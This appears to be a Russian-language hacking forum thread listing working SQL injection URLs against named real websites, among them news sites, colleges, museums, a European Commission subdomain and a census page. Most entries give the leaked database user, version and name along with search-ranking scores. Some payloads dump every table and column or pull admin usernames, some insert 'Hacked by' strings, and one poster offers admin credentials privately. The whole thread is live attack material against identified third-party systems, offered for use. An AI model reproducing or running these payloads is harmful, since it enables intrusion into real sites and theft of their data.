SQL Инъекции

Code:

http://www.laitkipers.ru/news.php?id=40+and+false+union+select+1,unhex%28hex%28concat%28user_name,0x3a,user_pass%29%29%29,3,4,5,6+from+user--+

ТИЦ: 10
PR: 1

Code:

http://www.yorkshirecoastcollege.ac.uk/news.php?id=479+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a)

ТИЦ: 0
PR: 6

Code:

http://rumafia.com/ru/news.php?id=-214+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16+--+

ТИЦ: 20
PR: 3

Code:

http://goldenformula.net/news.php?id=48+and+1=0+union+select+1,2,3,4,version%28%29,6--

ТИЦ: 100
PR: 4

 

PHP:

http://www.frontviewsgallery.de/exhibition.php?exhibition_id=6+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11--

 

Code:

http://www.astrakhanfm.ru/news/news.php?id=27341+and+1=0+union+select+1,version%28%29,database%28%29,4,user%28%29,6,7--

ТИЦ: 200
PR: 5

 

Code:

http://www.glimz.net/info.php?individual=4603%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201=1

User: [email protected]
Version: 5.0.51a-24+lenny5-log
Database: glimz_net1

PR 5
тИЦ 10

 

Code:

http://ngfrussia.ru/news.php?id=524+and+1=0+union+select+1,database%28%29,version%28%29,4,5,6,7,8,9,10--

DataBase: ngf
Version DB: 5.0.77
User BD: leni@localhost
ТИЦ: 40
PR: 3

Code:

http://www.chexov.net/news.php?id=571+union+select+user%28%29,database%28%29,3,4,version%28%29,6+--+

DataBase: u155206
Version DB: 5.0.77-log
User BD: u155206@localhost
ТИЦ: 4
PR: 3
P.S Смотрите комментарии

 

Code:

http://www.hellolulu.com/group.php?cat1_id=-1+union+select+1,2--

http://www.hellolulu.com/admin/

PR: 2
version: 5.0.45
user: hellolul@localhost
database: hellolul01

 

Code:

http://bwd.eea.[COLOR=YellowGreen][B]europa.eu[/B][/COLOR]/kml_export.php?cc=' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12,13,14,15,16,17,18,19,20 and 'x'='x

User: bwdfull@localhost
Version: 5.0.77
Database: bwd

PR 9
тИЦ 4800

P.S. На данном сайте уже была найдена уязвимость, но на другом поддомене с другой БД.

 

Code:

http://fishres.ru/news/news.php?id=14572+and+1=0+union+select+1,2,user%28%29,version%28%29,5,6,7,8,database%28%29--

DataBase: murfish4_test
Version DB: 4.0.27-log
User BD: [email protected]
ТИЦ: 600
PR: 3

Code:

http://www.civilista.ru/news.php?id=22+and+1=0+union+select+1,2,0x4861636b6564204279204f7373747564696f212121,version%28%29,5,database%28%29,7--

DataBase: u9620_civilista_ru
Version DB: 5.0.89-log
User BD: u9620@be2
ТИЦ: 20
PR: 2
P.S Обратите внимание на title
{
Current DB: u9620_civilista_ru
Data Base Found: information_schema
Data Base Found: u9620
Data Base Found: u9620_biruk
Data Base Found: u9620_cb
Data Base Found: u9620_civilista
Data Base Found: u9620_civilista_ru
Data Base Found: u9620_mediator
Data Base Found: u9620_mucb
Data Base Found: u9620_prav66
Data Base Found: u9620_prav66_forum
Data Base Found: u9620_privlaw
Data Base Found: u9620_zagovor
Data Base Found: u9620_zhurnal
Data Base Found: u9620_zhurnal_new
Введём тут http://2ip.ru/domain-list-by-ip/ наш сайт, и получим сайты из этих баз.

}

Code:

http://kolesaonline.ru/news.php?id=66+and+1=0+union+select+1,version%28%29,database%28%29,user%28%29,5,6--

DataBase: kolesa
Version DB: 4.1.25-log
User BD: kolesa-sql@localhost
ТИЦ: 120
PR: 2

Code:

http://www.fauna-servis.ua/news.php?id=407+and+1=0+union+select+1,2,0x4861636b6564204279204f7373747564696f2121,4,5,6,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29,8,9,10,11,12--

DataBase: faunaservis
Version DB: 5.0.51a-24+lenny5
User BD: u_faunaservi@localhost
ТИЦ: 50
PR: 3

 

Code:

http://www.rody18.spb.ru/news.php?id=51+and+1=0+union+select+1,2,0x5961207665726e756c73796121,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29,5,6,7,0x3a44--

DataBase: db00143987
Version DB: 4.1.25-log
User BD: 00143987@localhost
ТИЦ: 30
PR: 3

 

Code:

http://n-europe.eu/content/index.php?p=1262%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201=1

User: u3249_old@localhost
Version: 5.1.57-rel12.8
Database: u3249_old1

PR 6
тИЦ 300

P.S. Смотрим исходный код страницы, ошибка закомментирована.

 

http://www.mbzspeciesconservation.org/includes/get-data/getCountries.php?countryCode=-4+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)--

http://www.atic.ae/ar/media-center/generate-html-Ar.php?id=483+union+select+1,2,0x323030302d30312d3031,4,5,6,7,8,9,0,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)--

 

PHP:

http://www.angstromloudspeakers.com/item_list.php?sub_cat_id=-149+union+select+concat(database(),char(59),version(),char(59),user())+--+

VERSION : 4.1.22-standard
DATABASE : angstrom_sysdata
USER : angstrom_u0708@localhost
PR - 3

PHP:

http://www.aquaticdepot.net/sub_category_desc.php?sub_cat_id=-8+union+select+1,2,concat(database(),char(59),version(),char(59),user()),4,5,6+--+

VERSION : 5.0.91-log
DATABASE : db264189880
USER : [email protected]

PHP:

http://www.medicaltourismmag.com/detail.php?Req=199+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(database(),char(59),version(),char(59),user()),13,14,15,16,17+--+

VERSION : 5.0.92-community-log
DATABASE : medicalm_mtm
USER : medicalm_mtm@localhost
PR - 4

PHP:

http://www.greyblue.net/MidnightBlue/story.php?storyid=-2+union+select+1,2,concat(database(),char(59),version(),char(59),user()),4,5,6,7,8+--+

VERSION : 5.1.53-log
DATABASE : greyblue
USER : [email protected]
PR - 1

PHP:

http://www.thecardchest.com/sid/viewStory.php?storyID=-243+union+select+1,2,concat(database(),char(59),version(),char(59),user()),4+--+

VERSION : 5.0.77
DATABASE : sid
USER : sidUser@localhost
PR - 3

 

Code:

http://www.club-crosswind.com/news.php?id=161+and+1=0+union+select+1,2,3,4,5,6,0x4861636b6564206279204f7373747564696f212121,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29--

DataBase: clubcrosswindcom
Version DB: 5.0.51a-24+lenny4-log
User BD: clubcrosswindcom@localhost
ТИЦ: 40
PR: 4

Code:

http://vniisubtrop.ru/news.php?id=1+and+1=0+union+select+1,2,version%28%29,4,5,6,7,database%28%29--

DataBase: gb_vnii
Version DB: 5.0.54-log
User BD: [email protected]
ТИЦ: 20
PR: 2

 

http://www.safmuseum.org/pages/bio.php?id=-70%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,version%28%29,23,24,25,26,27--+from+admins--+.html



И еще чутка г**на:
http://www.starkeyhearingfoundation.org/post-event.php?id=-41+union+select+1,2,3,4,5,6,7,8,user%28%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+

 

Code:

http://www.noutov.info/news.php?id=7+and+1=0+union+select+1,2,version%28%29,database%28%29,5,6,7--

DataBase: dbeuronout
Version DB: 4.0.26-log
User BD: noutov@localhost
ТИЦ: 30
PR: 2

 

Code:

http://www.stella-science.eu/initiatives_view.php?id=710 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

User: stella@localhost
Version: 5.0.77-log
Database: stella1

PR 5

Code:

http://www.burko.eu/index.php?id=22.2%20union%20all%20select%20concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29+--+

User: root@localhost
Version: 5.1.56
Database: today

PR 1

 

SQLI

Code:

_http://uventa-spb.ru/index.php?new=1+union+select+1,2,username,4,5,6,7,8,8+from+z102451_uventa.jv_users+where+id=1+--+

5.1.49-3-log
z102451_uventa
[email protected]
==================================================
BSQLI

Code:

_http://ruselt.ru/news.php?id=1&page=191+union+select+1,2,3,4,5,6,7,8+--+

5.0.90-log
u33206
[email protected]
==================================================
SQLI

Code:

_http://www.lyceumtheatre.org/production.php?id=1+union+select+1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,1,1,1+--+

5.0.51a-3ubuntu5.1
lyceumtheatre
testlyceum@localhost

 

stranger1341, за данными админа в ЛС.

Code:

http://www.sklepy-online.pl/?exec=showscat&id=51.1'+union+select+concat_ws(0x3a,user(),version(),database()),2+and+'x'='x

User: sql_arteesoft13@localhost
Version: 5.1.49-3
Database: sql_arteesoft13_so

PR 4

 

http://www.census.gov/ces/whatsnew/newsarchive.php?more=-10+union+select+1,2,3,4,5,6--+

 

Code:

http://www.prokitetour.com/news.php?id=185%27+and+1=0+union+select+1,2,3,version%28%29,database%28%29,user%28%29,7,8+--+

DataBase: db271821761
Version DB: 5.0.77
User BD: db271821761@localhost
ТИЦ: 20
PR: 4